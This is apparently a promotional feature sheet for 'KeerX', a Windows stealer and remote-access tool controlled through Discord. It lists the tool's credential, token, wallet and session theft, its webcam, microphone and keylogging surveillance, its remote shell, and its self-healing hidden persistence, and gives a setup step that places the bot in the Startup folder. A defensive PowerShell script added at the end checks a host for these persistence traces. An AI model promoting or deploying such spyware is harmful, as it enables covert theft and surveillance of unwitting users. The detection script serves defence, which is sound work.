KeerX Analysis

Created by Itskeer

v2.5.0-stable

Application Overview

The KeerX WindowsHelper is a high-utility remote surveillance asset developed by Itskeer. Engineered for Windows x64 environments, it utilizes a Python 3.11 core to perform deep data exfiltration, real-time monitoring, and persistent system interaction via a Discord-integrated C2 interface.

Format: Standalone .exe
Size: ~82.5 MB
Engine: Python 3.11
OS: Win x64

Deployment Protocol

To ensure the KeerX bot functions with maximum persistence and starts automatically upon system boot, follow the mandatory setup:

Installation Directory

The Bot.exe MUST be placed in the Windows Startup folder:

shell:startup

Hash Verified: SHA-256 Official Build by Itskeer

Data Targets

Risk Profile

1. Data Extraction (Stealer Suite)

Browser Data

Extracts passwords, cookies, and history from Chrome, Edge, and Brave via AES-GCM decryption.

Discord Tokens

Scans local state files for Discord and Discord Canary authentication tokens.

Crypto Wallets

Targets Electrum and Exodus wallet files specifically for exfiltration.

Sessions

Identifies and packages Steam and Telegram desktop session data.

2. Surveillance & Monitoring

Visual Streaming

Live screen and webcam streaming directly to Discord via MSS and OpenCV.

Audio Intercept

Remote microphone recording in 30s-60s chunks, uploaded as voice assets.

Keylogger

Continuous buffer dumping, clipboard tracking, and active window monitoring.

3. Remote Control & Interaction

  • Full Remote CMD / PowerShell Shell Access
  • Live Python REPL Execution Interface
  • Mouse & Keyboard Input Emulation (PyAutoGUI)

4. Internal Security & Bypasses

  • SSL Fix: Disables SSL verification for aiohttp and requests to ensure connectivity.
  • Self-Healing: Watchdog thread auto-restores files and registry keys if deleted.
  • Stealth: Uses System/Hidden attributes in AppData local folders.
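Host triage for the placement and stealth traits described above (an executable in the Startup folder, System/Hidden files under AppData Local), as an added example that is not part of the original page or the tool. The 50 MB size threshold and the Run-key check are assumptions: the page gives only the ~82.5 MB build size and does not name the registry keys involved.

```powershell
# Added read-only triage example. Locations come from the page; the size threshold
# and the Run-key check are assumptions made for this example.
$minSize = 50MB   # assumption: flags large bundles near the ~82.5 MB the page cites

# 1. Executables sitting directly in a Startup folder (normally only .lnk shortcuts).
$startupDirs = 'Startup', 'CommonStartup' |
    ForEach-Object { [Environment]::GetFolderPath($_) } |
    Where-Object { $_ -and (Test-Path -LiteralPath $_) }
$startupHits = foreach ($dir in $startupDirs) {
    Get-ChildItem -LiteralPath $dir -File -Force -ErrorAction SilentlyContinue |
        Where-Object { $_.Extension -eq '.exe' }
}

# 2. Executables under %LOCALAPPDATA% carrying both the Hidden and System attributes.
$mask = [IO.FileAttributes]'Hidden, System'
$hiddenHits = Get-ChildItem -LiteralPath $env:LOCALAPPDATA -Recurse -File -Force -ErrorAction SilentlyContinue |
    Where-Object { $_.Extension -eq '.exe' -and ($_.Attributes -band $mask) -eq $mask }

# 3. Run-key values that launch something from %LOCALAPPDATA%.
#    Assumption: the page mentions registry keys without naming them.
$runKeys = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
           'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run'
$psMeta  = 'PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider'
$runHits = foreach ($key in $runKeys) {
    $props = Get-ItemProperty -LiteralPath $key -ErrorAction SilentlyContinue
    if ($props) {
        $props.PSObject.Properties |
            Where-Object { $_.Name -notin $psMeta -and
                "$($_.Value)".IndexOf($env:LOCALAPPDATA, [StringComparison]::OrdinalIgnoreCase) -ge 0 } |
            ForEach-Object { [pscustomobject]@{ Key = $key; Name = $_.Name; Command = $_.Value } }
    }
}

# 4. One row per flagged file, with hash and signature status for follow-up.
$report = @($startupHits) + @($hiddenHits) | Where-Object { $_ } |
    Sort-Object FullName -Unique | ForEach-Object {
        [pscustomobject]@{
            Path      = $_.FullName
            SizeMB    = [math]::Round($_.Length / 1MB, 1)
            Large     = $_.Length -ge $minSize
            Attrs     = $_.Attributes
            Created   = $_.CreationTimeUtc
            SHA256    = (Get-FileHash -LiteralPath $_.FullName -ErrorAction SilentlyContinue).Hash
            Signature = (Get-AuthenticodeSignature -LiteralPath $_.FullName).Status
        }
    }
$report  | Format-List
$runHits | Format-List
```

Because the page describes a watchdog that restores deleted files and registry keys, removing a flagged file while its process is still running is likely to be undone; isolate the host and stop the process before cleaning up artifacts.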